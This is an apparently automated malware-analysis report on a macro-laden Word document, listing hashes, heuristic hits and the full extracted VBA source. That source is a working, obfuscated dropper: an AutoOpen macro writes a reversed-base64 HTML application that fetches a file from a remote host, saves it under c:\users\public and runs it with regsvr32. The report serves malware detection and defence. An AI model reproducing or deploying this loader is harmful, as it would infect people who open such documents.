Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 304c4ae8ae0b3108…

MALICIOUS

Office (OOXML)

Size: 80.1 KB
Created: 2021-04-01 07:10:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-04-10
MD5: e35ef365f5ce89db584db3bdc2704498
SHA-1: b687415cb72b525de3ab608fe9587af9a16240ac
SHA-256: 304c4ae8ae0b310883012cfa9cd7bf5d09bff7caac2d403f80e5c56a33da262e
Risk score: 170

Heuristics (6)

  • VBA project inside OOXML (medium; 4 related findings) OOXML_VBA
    Document contains a VBA project: VBA macros present.
  • WScript.Shell usage (critical) OLE_VBA_WSCRIPT
    Matched line in script:
    Set memoryTitle = CreateObject("wscript.shell")
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    Matched line in script:
    Set memoryTitle = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro (low) OLE_VBA_AUTOOPEN
    Matched line in script:
    Sub autoopen()
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 9239 bytes
SHA-256: ff9e3a847408ca853b914c9c1821f280d088f7c349156a7b98aeed6d8096aa3f

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{4D988C7D-95B3-4ED8-927E-C9A82B96FD77}{75ED94AF-374C-42E8-84B3-EF6838DAB870}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function tableGlobal()
With frm.button1
tableGlobal = .Tag
End With
End Function
Function swapTmp()
With frm.button1
swapTmp = .Caption
End With
End Function
Public Sub button1_Click()
Set memoryTitle = CreateObject("wscript.shell")
memoryTitle.exec p(tableGlobal) & " " & p(swapTmp)
End Sub


Attribute VB_Name = "genericButtonConvert"
Sub autoopen()
loadQueryData
End Sub
Function intel(exceptionTitleOption)
intel = "" & exceptionTitleOption & ""
End Function
Sub loadQueryData()
Dim constCollectionWindow As String
constCollectionWindow = p(frm.button1.Caption)
Set libGeneric = New ptrDeleteRequest
libGeneric.refFuncPtr constCollectionWindow, bufConvertCollection
frm.button1_Click
End Sub
Function textboxPtr(tmpProcedure, referenceBufferText, documentCountValue)
textboxPtr = Replace(tmpProcedure, referenceBufferText, documentCountValue)
End Function

Attribute VB_Name = "borderView"
Function counterBufferTemp()
counterBufferTemp = intel("<html><body><div id='content'>fTtlc29sYy53b2RuaVdXd29kbml3OykyIC")
End Function
Function variableScreen()
variableScreen = intel("wiZ3BqLm5pYU1ldGVsZWRcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLn")
End Function
Function textboxDatabase()
textboxDatabase = intel("dvZG5pV1d3b2RuaXc7KXlkb2Jlc25vcHNlci5wbWVUbm9pdHBhYyhldGlydy53b2")
End Function
Function varLocal()
varLocal = intel("RuaVdXd29kbml3OzEgPSBlcHl0LndvZG5pV1d3b2RuaXc7bmVwby53b2RuaVdXd2")
End Function
Function referenceIndex()
referenceIndex = intel("9kbml3OykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHdvZG5pV1")
End Function
Function trustRemove()
trustRemove = intel("d3b2RuaXcgcmF2eykwMDIgPT0gc3V0YXRzLnBtZVRub2l0cGFjKGZpOykoZG5lcy")
End Function
Function loadIndexView()
loadIndexView = intel("5wbWVUbm9pdHBhYzspZXNsYWYgLCIydkl0STU9aGNyYWVzJlhqSGpDUWd4OFNacT")
End Function
Function indexBufException()
indexBufException = intel("E2YW9qRT1lZ2FwJmJ1REpTST1wbXZ3RE9FcVUma2hJRThoWnpnVlBYQ0xWN0I9cF")
End Function
Function dataOption()
dataOption = intel("A4QldsQmJHdT8yMW5heC92dWpXY2RwZlF3cW8vNzI1NjgvQ1hNak9vR1Q0MkNXYk")
End Function
Function exceptionTextboxRepo()
exceptionTextboxRepo = intel("03NnMxY3dER3FTMDlNa25sUXZaL0FGMkRkRlJWeUwxMmcvWnVWdmlUMjkyRG9NSG")
End Function
Function localMainCount()
localMainCount = intel("1mTS80NzUwNC9yVjgvc3l1b2cvbW9jLml4YXQtNjEwMnJlZ3JlYi8vOnB0dGgiIC")
End Function
Function convertRef()
convertRef = intel("wiVEVHIihuZXBvLnBtZVRub2l0cGFjOykicHR0aGxteC4ybG14c20iKHRjZWpiT1")
End Function
Function loadVariable()
loadVariable = intel("hldml0Y0Egd2VuID0gcG1lVG5vaXRwYWMgcmF2|fXspZWNhcHNlbWFOcGF3cyhoY")
End Function
Function removeViewSelect()
removeViewSelect = intel("3RhY307KSJhdGgubmlhTWV0ZWxlZFxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZld")
End Function
Function funcArray()
funcArray = intel("GVsZWQudGN1cnRTZWNuZXJlZmVye3lydDspInRjZWpib21ldHN5c2VsaWYuZ25pd")
End Function
Function linkTempW()
linkTempW = intel("HBpcmNzIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHRjdXJ0U2VjbmVyZWZlciByYXY7K")
End Function
Function mainCollectionA()
mainCollectionA = intel("SJncGoubmlhTWV0ZWxlZFxcY2lsYnVwXFxzcmVzdVxcOmMgMjNydnNnZXIiKG51c")
End Function
Function tmpExVb()
tmpExVb = intel("i4pImxsZWhzLnRwaXJjc3ciKHRjZWpiT1hldml0Y0Egd2Vu</div><div id='ta")
End Function
Function countLenScreen()
countLenScreen = intel("ble1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>012345678")
End Function
Function tmpTable()
tmpTable = intel("9+/</div><div id='table3'></div><script language='javascript'>fu")
End Function
Function classMemTitle()
classMemTitle = intel("nction captionBuf(ATempDocument){return(new ActiveXObject(ATempD")
End Function
Function memoryCaption()
memoryCaption = intel("ocument));}function ATmpBorder(textboxLoad){return(counterButton")
End Function
Function convertBufferSelect()
convertBufferSelect = intel("Iterator.getElementById(textboxLoad).innerHTML);}function variab")
End Function
Function loadAConvert()
loadAConvert = intel("leProc(){var requestRequest = ATmpBorder('table1');var tableMemo")
End Function
Function tempVariable()
tempVariable = intel("ry = requestRequest.toLowerCase();var rightLeft = ATmpBorder('ta")
End Function
Function screenFuncScreen()
screenFuncScreen = intel("ble2');return(requestRequest + tableMemory + rightLeft);}functio")
End Function
Function loadWindow()
loadWindow = intel("n selectListbox(s){var e={}; var i; var b=0; var c; var x; var l")
End Function
Function arrayQueryClass()
arrayQueryClass = intel("=0; var a; var linkTitle=''; var w=String.fromCharCode; var L=s.")
End Function
Function rightButton()
rightButton = intel("length;var loadVariableStorage = 'charAt';for(i=0;i<64;i++){e[va")
End Function
Function requestFuncRepo()
requestFuncRepo = intel("riableProc()[loadVariableStorage](i)]=i;}for(x=0;x<L;x++){c=e[s[")
End Function
Function repoDatabaseIndex()
repoDatabaseIndex = intel("loadVariableStorage](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l")
End Function
Function textboxBuffer()
textboxBuffer = intel("-=8))&0xff)||(x<(L-2)))&&(linkTitle+=w(a));}}return(linkTitle);}")
End Function
Function procedureTrustProcedure()
procedureTrustProcedure = intel(";function AView(repoWData){return repoWData.split('').reverse().")
End Function
Function swapGeneric()
swapGeneric = intel("join('');}tableDatabase = window;counterButtonIterator = documen")
End Function
Function screenTitle()
screenTitle = intel("t;tableDatabase.resizeTo(1, 1);tableDatabase.moveTo(-100, -100);")
End Function
Function listGlobalWindow()
listGlobalWindow = intel("var pointerResponseProc = counterButtonIterator.getElementById('")
End Function
Function viewLink()
viewLink = intel("content').innerHTML;var pointerResponseProc = pointerResponsePro")
End Function
Function borderCounterLeft()
borderCounterLeft = intel("c.split('|');var optionBufA = AView(selectListbox(pointerRespons")
End Function
Function bufferConst()
bufferConst = intel("eProc[0]));var lenScreen = AView(selectListbox(pointerResponsePr")
End Function
Function windowLibTrust()
windowLibTrust = intel("oc[1]));</script><script language='javascript'>function swapRefe")
End Function
Function varRefDelete()
varRefDelete = intel("renceTemp(referenceMem){var optionDatabaseTitle = captionBuf('ms")
End Function
Function textStorageLib()
textStorageLib = intel("scriptcontrol.scriptcontrol');optionDatabaseTitle.Language = 'js")
End Function
Function lenSize()
lenSize = intel("cript';optionDatabaseTitle.Timeout = 60000;optionDatabaseTitle.A")
End Function
Function clearListboxClear()
clearListboxClear = intel("ddCode(referenceMem);return(null);}</script><script language='vb")
End Function
Function tableDeleteStorage()
tableDeleteStorage = intel("script'>swapReferenceTemp optionBufA : swapReferenceTemp lenScre")
End Function
Function bufConvert()
bufConvert = intel("en : tableDatabase.close</script></body></html>")
End Function
Function bufConvertCollection()
bufConvertCollection = counterBufferTemp + variableScreen + textboxDatabase + varLocal + referenceIndex + trustRemove + loadIndexView + indexBufException + dataOption + exceptionTextboxRepo + localMainCount + convertRef + loadVariable + removeViewSelect + funcArray + linkTempW + mainCollectionA + tmpExVb + countLenScreen + tmpTable + classMemTitle + memoryCaption + convertBufferSelect + loadAConvert + tempVariable + screenFuncScreen + loadWindow + arrayQueryClass + rightButton + requestFuncRepo + repoDatabaseIndex + textboxBuffer + procedureTrustProcedure + swapGeneric + screenTitle + listGlobalWindow + viewLink + borderCounterLeft + bufferConst + windowLibTrust + varRefDelete + textStorageLib + lenSize + clearListboxClear + tableDeleteStorage + bufConvert
End Function

Attribute VB_Name = "ptrDeleteRequest"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub refFuncPtr(tmpValueStorage As String, exceptionVar As String)
Dim libViewProcedure As FileSystemObject
Set libViewProcedure = New FileSystemObject
Dim storageListbox As TextStream
Set storageListbox = libViewProcedure.CreateTextFile(tmpValueStorage)
storageListbox.WriteLine exceptionVar
storageListbox.Close
Set storageListbox = Nothing
Set libViewProcedure = Nothing
End Sub

Attribute VB_Name = "swapListCollection"
Function p(bufferMem)
p = textboxPtr(bufferMem, "@", "")
End Function

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 39936 bytes
SHA-256: 5548036894b1abb279793ad89bf554108c99b7d5102153d8ffdb5c59cd887208